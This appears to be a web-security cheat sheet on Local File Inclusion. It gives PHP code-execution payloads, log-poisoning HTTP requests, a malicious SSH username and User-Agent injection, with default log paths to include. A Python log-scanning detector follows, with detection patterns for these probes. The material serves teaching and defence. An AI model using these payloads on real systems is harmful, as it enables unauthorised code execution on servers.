LFI
Local File Inclusion detection and exploitation techniques.
Detection
…
Exploitation
An LFI can allow you to execute arbitrary code by including files that the web server was never meant to interpret as code (such as PHP or ASP).
Example:
<?php system('id'); ?>
Upload
If you can find a way to upload your own files to the website, you can simply embed code within it and try to include it with the LFI.
Tip
The file does not have to respect the extension or MIME type of the code you’re trying to embed. For example, if you can only upload images, try to embed code at the end of the image file.
Log Poisoning
Most web servers log every incoming request to a local access log file. Logs usually include the requested URL and the Referer header, both of which you control, so you can try to include arbitrary code through them.
Example:
GET /<? phpinfo(); ?> HTTP/1.1
Host: vulnerable-website.com
Referer: <? phpinfo(); ?>
Depending on the web server and operating system, logs can be found at the following default locations:
Path | Web Server | OS |
---|---|---|
/proc/self/fd/<int> | ALL | ALL (symlink to the files opened by the running process) |
/var/log/httpd/access_log, /var/log/httpd/error_log | Apache2 | RHEL, CentOS, Fedora |
/var/log/apache2/access.log, /var/log/apache2/error.log | Apache2 | Debian, Ubuntu |
/var/log/httpd-access.log, /var/log/httpd-error.log | Apache2 | FreeBSD |
/var/log/nginx/access.log, /var/log/nginx/error.log | NginX | RHEL, CentOS, Fedora, Debian, Ubuntu |
The same log poisoning technique can also be performed against SSH. However, those logs are usually readable by root only.
Example:
ssh -l '<? phpinfo(); ?>' vulnerable-website.com
Path | OS |
---|---|
/var/log/secure | RHEL, CentOS, Fedora |
/var/log/auth.log | Debian, Ubuntu, FreeNAS |
User-Agent
For every running process on a Linux host, there is a /proc/self/environ file which contains the environment variables associated with it, including HTTP_USER_AGENT. This means that you can try to embed code and include it by tampering with the User-Agent header.
Example:
GET / HTTP/1.1
Host: vulnerable-website.com
User-Agent: <? phpinfo(); ?>
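The defender's counterpart to the log poisoning and User-Agent techniques above, as an added example that is not part of the original page: a small Python detector that scans Apache/Nginx combined-format access log lines for inclusion probes (traversal sequences, references to /proc/self/environ, /proc/self/fd or log paths) and for poisoning attempts (a PHP open tag in the request line, Referer or User-Agent). The log lines are constructed samples and the patterns are my own assumptions, not a vendor rule set.

```python
import re
from urllib.parse import unquote

# Apache/Nginx "combined" format:
# ip - - [ts] "METHOD path HTTP/x" status bytes "referer" "user-agent"
COMBINED_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<req>[^"]*)" '
    r'(?P<status>\d{3}) (?P<size>\S+) "(?P<referer>[^"]*)" "(?P<ua>[^"]*)"$'
)
# File-inclusion probes: traversal, /proc/self/*, log and passwd paths in the request.
LFI_PATH_RE = re.compile(
    r'(\.\./|\.\.\\|/proc/self/(environ|fd)|/var/log/|/etc/passwd)', re.I)
# Log poisoning: a PHP open tag ("<?", "<?php", "<?=") in any client-controlled field.
PHP_TAG_RE = re.compile(r'<\?(php\b|=|\s)', re.I)

def analyse_line(line):
    """Return the findings for one access-log line ([] if clean or not parsable)."""
    m = COMBINED_RE.match(line)
    if not m:
        return []
    findings = []
    # URL-decode once so %2e%2e%2f and %3C%3F are inspected in clear text.
    if LFI_PATH_RE.search(unquote(m.group('req'))):
        findings.append('lfi_probe')
    for field in ('req', 'referer', 'ua'):
        if PHP_TAG_RE.search(unquote(m.group(field))):
            findings.append('log_poisoning:' + field)
    return findings

def scan(lines):
    """Map line index -> findings for every suspicious line in an access log."""
    hits = {}
    for i, line in enumerate(lines):
        findings = analyse_line(line)
        if findings:
            hits[i] = findings
    return hits

# Constructed sample log lines (not real traffic): one benign request, three probes.
LOG_LINES = [
    '203.0.113.5 - - [10/Oct/2023:13:55:36 +0000] "GET /index.php?page=about HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '203.0.113.5 - - [10/Oct/2023:13:55:40 +0000] "GET /index.php?page=../../../../proc/self/environ HTTP/1.1" 200 2048 "-" "<? phpinfo(); ?>"',
    '203.0.113.5 - - [10/Oct/2023:13:55:44 +0000] "GET /%3C%3F%20phpinfo()%3B%20%3F%3E HTTP/1.1" 404 196 "<? phpinfo(); ?>" "curl/8.0"',
    '203.0.113.5 - - [10/Oct/2023:13:55:50 +0000] "GET /index.php?page=%2e%2e%2f%2e%2e%2fvar/log/apache2/access.log HTTP/1.1" 200 9001 "-" "Mozilla/5.0"',
]

if __name__ == '__main__':
    for idx, findings in scan(LOG_LINES).items():
        print(idx, findings)
```

A hit on `log_poisoning:*` is the moment to check whether any include path on the server can reach the access log, since the tag is already written to disk by the time the line is logged.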